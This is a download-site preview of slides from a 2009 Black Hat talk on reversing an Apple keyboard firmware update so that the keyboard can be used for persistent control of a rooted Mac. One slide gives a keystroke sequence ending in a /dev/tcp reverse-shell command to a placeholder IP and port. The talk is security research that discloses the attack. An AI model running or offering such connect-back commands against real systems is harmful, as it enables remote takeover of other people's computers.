ebook img

Reversing and Exploiting an Apple Firmware Update - Black Hat PDF

190 Pages·2009·5.13 MB·English
by  K. Chen
Save to my drive
Quick download
Download
Most books are stored in the elastic cloud where traffic is expensive. For this reason, we have a limit on daily download.

Preview Reversing and Exploiting an Apple Firmware Update - Black Hat

Introduction FirmwareUpdate Analysis Exploitation Reversing and Exploiting an Apple Firmware Update K. Chen Black Hat USA, July 30th, 2009 K.Chen ReversingandExploiting anAppleFirmwareUpdate Introduction Motivation FirmwareUpdate Keyboardcontrol Analysis Apple’skeyboards Exploitation Firmwarebugs 1 Introduction Motivation Keyboard control Apple’s keyboards Firmware bugs 2 Firmware Update 3 Analysis 4 Exploitation K.Chen ReversingandExploiting anAppleFirmwareUpdate Introduction Motivation FirmwareUpdate Keyboardcontrol Analysis Apple’skeyboards Exploitation Firmwarebugs Scenario (post-exploitation): We’ve rooted somebody’s Mac OS X box Say after reading “The Mac Hacker’s Handbook” by Charlie Miller and Dino Dai Zovi We want to maintain control of the box http://upload.wikimedia.org/wikipedia/en/1/1f/Sad_mac.png K.Chen ReversingandExploiting anAppleFirmwareUpdate Introduction Motivation FirmwareUpdate Keyboardcontrol Analysis Apple’skeyboards Exploitation Firmwarebugs Proof-of-concept rootkit “iRK - Crafting OS X Kernel Rootkits” by Jesse D’Aguanno (Black Hat 2008) We want to maintain control, even if Apple releases patch for vulnerability we used Owner is paranoid and re-installs Mac OS X from clean media Owner safely updates patch level K.Chen ReversingandExploiting anAppleFirmwareUpdate Introduction Motivation FirmwareUpdate Keyboardcontrol Analysis Apple’skeyboards Exploitation Firmwarebugs Fortunately for an attacker Apple has a habit of releasing products before they’re ready Apple then later issues firmware updates In May 2009, almost 1000 firmware updates available for download from support.apple.com The Mac world is incredibly monocultural K.Chen ReversingandExploiting anAppleFirmwareUpdate Introduction Motivation FirmwareUpdate Keyboardcontrol Analysis Apple’skeyboards Exploitation Firmwarebugs http://support.apple.com/downloads/ K.Chen ReversingandExploiting anAppleFirmwareUpdate Introduction Motivation FirmwareUpdate Keyboardcontrol Analysis Apple’skeyboards Exploitation Firmwarebugs Apple has firmware updates available for: graphics cards keyboards trackpads bluetooth EFI SuperDrive AirPort products Time Capsule etc. K.Chen ReversingandExploiting anAppleFirmwareUpdate Introduction Motivation FirmwareUpdate Keyboardcontrol Analysis Apple’skeyboards Exploitation Firmwarebugs What can we do with control of the keyboard? http://www.flickr.com/photos/errorsan/164315682/ K.Chen ReversingandExploiting anAppleFirmwareUpdate Introduction Motivation FirmwareUpdate Keyboardcontrol Analysis Apple’skeyboards Exploitation Firmwarebugs How about shoveling a shell? 1 Command - Space 2 terminal K.Chen ReversingandExploiting anAppleFirmwareUpdate Introduction Motivation FirmwareUpdate Keyboardcontrol Analysis Apple’skeyboards Exploitation Firmwarebugs 3 Return 4 exec /bin/sh 0</dev/tcp/IP/PORT 1>&0 2>&0 Return http://labs.neohapsis.com/2008/04/17/connect-back-shell-literally/ K.Chen ReversingandExploiting anAppleFirmwareUpdate

Description:
Jul 30, 2009 Apple releases patch for vulnerability we used. Owner is paranoid Page 7 0000030 7c 7e 7d 17 89 7e 7e 30 30 30 7d 06 96 7e 7e 30.
See more

The list of books you might like

Most books are stored in the elastic cloud where traffic is expensive. For this reason, we have a limit on daily download.